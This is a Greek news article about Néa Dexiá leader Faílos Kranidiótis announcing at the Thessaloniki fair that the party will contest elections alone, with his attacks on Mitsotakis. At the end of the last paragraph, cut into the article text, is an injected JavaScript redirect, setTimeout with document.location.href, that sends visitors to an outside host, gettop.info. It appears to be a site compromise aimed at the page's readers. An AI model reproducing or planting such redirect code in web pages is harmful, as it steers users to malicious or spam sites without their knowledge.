Αυτόνομη η Νέα Δεξιά στις εκλογές

0
3

 

Η Νέα Δεξιά θα κατέβει αυτόνομα στις βουλευτικές εκλογές, δήλωσε ο πρόεδρος του κόμματος Φαήλος Κρανιδιώτης, στη διάρκεια συνέντευξης Τύπου που έδωσε στο πλαίσιο της ΔΕΘ.

«Δεν πιστεύω ότι θα γίνουν γρήγορα εκλογές, αλλά εμείς ετοιμαζόμαστε, γιατί ένα κόμμα πρέπει να είναι πάντα έτοιμο» επεσήμανε ο κ. Κρανιδιώτης και πρόσθεσε πως προχωρεί η συγκρότηση δικτύων της Νέας Δεξιάς σε πανελλαδική κλίμακα και πως σύντομα θα ανακοινωθούν τα ονόματα ανθρώπων που έχουν προσχωρήσει στο κόμμα στην περιοχή της Θεσσαλονίκης. Εξέφρασε δε την αισιοδοξία το επόμενο διάστημα να υπάρχει καταγραφή και σε δημοσκοπήσεις.

«Είμαστε κανονικοί άνθρωποι, που αγαπάμε την πατρίδα, πιστεύουμε στο έθνος και υπερασπιζόμαστε την ταυτότητά μας. Διαχωριζόμαστε από την παλιά δεξιά και απαντάμε σε ένα πραγματικό πολιτικό κενό» τόνισε για το όνομα του κόμματος.

Ο κ. Κρανιδιώτης επιτέθηκε στον πρόεδρο της Νέας Δημοκρατίας, Κυριάκο Μητσοτάκη, με αφορμή τα όσα είπε κατά την επίσκεψή του στην 81η Διεθνή Έκθεση Θεσσαλονίκης. «Ο κ. Μητσοτάκης θεωρεί ότι η χώρα είναι εταιρεία, χρειάζεται μάνατζερ και το μόνο θέμα είναι αν θα αλλάξει ο φοροεισπράκτορας» παρατήρησε. Επιπλέον επισήμανε ότι ο κ. Μητσοτάκης δεν αναφέρθηκε καθόλου στο μακεδονικό και τα εθνικά θέματα, ενώ συμφωνεί με τον ΣΥΡΙΖΑ στα θέματα του Μεταναστευτικού και του συμφώνου συμβίωσης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here